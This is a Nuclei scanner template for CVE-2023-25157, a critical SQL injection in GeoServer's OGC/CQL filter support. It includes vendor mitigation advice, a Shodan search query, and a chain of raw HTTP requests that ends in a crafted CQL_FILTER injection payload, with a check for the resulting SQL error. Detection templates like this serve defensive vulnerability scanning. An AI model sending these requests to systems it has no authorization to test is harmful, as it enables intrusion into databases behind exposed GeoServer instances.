nuclei-templates/http/cves/2023/CVE-2023-25157.yaml

70 lines
2.6 KiB
YAML

id: CVE-2023-25157
info:
name: GeoServer OGC Filter - SQL Injection
author: ritikchaddha,DhiyaneshDK,iamnoooob,rootxharsh
severity: critical
description: |
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.
reference:
- https://twitter.com/parzel2/status/1665726454489915395
- https://nvd.nist.gov/vuln/detail/CVE-2023-25157
- https://github.com/win3zz/CVE-2023-25157
- https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-25157
cwe-id: CWE-89
cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
metadata:
verified: "true"
shodan-query: title:"geoserver"
tags: cve,cve2023,geoserver,ogc,sqli,intrusive
http:
- raw:
- |
GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1
Host: {{Hostname}}
- |
GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 30s
GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
iterate-all: true
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- "SQL SELECT"
- type: word
part: header_3
words:
- text/xml
extractors:
- type: regex
part: body_1
group: 1
name: name
regex:
- '<FeatureType><Name>(.*?)<\/Name><Title>'
internal: true
- type: regex
part: body_2
group: 1
name: column
regex:
- 'FID,([aA-zZ_]+),'
internal: true